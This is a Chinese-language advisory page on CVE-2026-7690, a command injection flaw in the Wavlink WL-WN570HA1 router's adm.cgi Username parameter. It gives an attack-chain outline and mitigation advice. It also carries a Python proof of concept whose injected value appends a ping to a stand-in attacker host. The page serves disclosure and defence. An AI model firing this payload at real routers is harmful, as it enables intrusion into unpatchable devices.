CVE-2026-7690 CVSS 6.3 中危

CVE-2026-7690 Wavlink命令注入漏洞

披露日期: 2026-05-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7690

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wavlink WL-WN570HA1

漏洞概述

Wavlink WL-WN570HA1路由器R70HA1 V1410_221110版本存在严重的命令注入漏洞。攻击者可利用/cgi-bin/adm.cgi中set_sys_adm函数的Username参数注入恶意操作系统命令。由于该漏洞允许远程低权限攻击者在无交互情况下执行代码，直接威胁设备的机密性、完整性和可用性。鉴于产品已停产，用户需采取紧急隔离措施。

技术细节

该漏洞源于Wavlink WL-WN570HA1路由器Web管理界面/cgi-bin/adm.cgi脚本中set_sys_adm函数的输入验证缺失。当该函数处理管理员设置请求时，直接将用户提交的"Username"参数拼接到系统命令中执行，未进行任何转义或过滤。攻击者可构造包含管道符、分号等Shell元字符的特制Payload，导致服务器解析并执行任意系统指令。根据CVSS 3.1评分，该漏洞攻击向量为网络（AV:N），攻击复杂度低（AC:L），且无需用户交互（UI:N）。攻击者仅需具备低权限（PR:L）即可发起攻击，成功利用可读取敏感文件、修改系统配置或导致服务中断。鉴于厂商已停止支持，利用该漏洞可导致设备完全沦陷。

攻击链分析

STEP 1

侦察

攻击者扫描网络以识别Wavlink WL-WN570HA1设备，并确认其运行在易受攻击的固件版本R70HA1 V1410_221110上。

STEP 2

访问与认证

攻击者访问设备的Web管理界面（端口80/443）。由于CVSS评分为PR:L（低权限），攻击者可能需要低权限账户凭证，或者利用其他方式获取初步访问权限。

STEP 3

漏洞利用

攻击者向/cgi-bin/adm.cgi发送特制的HTTP POST请求，在set_sys_adm函数的Username参数中注入恶意的Shell命令（如通过分号分隔）。

STEP 4

命令执行

服务器端CGI脚本未过滤该参数，直接将其传递给系统Shell执行，导致攻击者的命令（如反弹Shell、下载恶意软件）在设备上运行。

STEP 5

建立控制

攻击者利用执行的命令获取设备控制权，进一步窃取数据、修改路由配置或将其作为跳板攻击内网其他设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable device
target_url = "http://<TARGET_IP>/cgi-bin/adm.cgi"

# The vulnerable function is set_sys_adm
# The 'Username' parameter is vulnerable to command injection
# Example payload: appending a shell command to execute
malicious_username = "admin; ping -c 4 attacker.com"

# Data payload to be sent in the POST request
payload_data = {
    "action": "set_sys_adm",
    "Username": malicious_username,
    "Password": "password123"
}

try:
    # Sending the POST request to trigger the vulnerability
    response = requests.post(target_url, data=payload_data)
    
    # Check if the request was sent (response status may vary)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check your listener or network traffic for command execution indication.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Wavlink WL-WN570HA1 R70HA1 V1410_221110

防御指南

临时缓解措施

鉴于厂商已明确表示该产品不再支持且相关固件已下架，目前不存在官方补丁。唯一的缓解措施是实施严格的网络隔离：禁用设备的远程管理功能，并通过防火墙或ACL规则限制对设备TCP 80和443端口的访问，仅允许特定IP地址连接。建议尽快制定设备更换计划。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表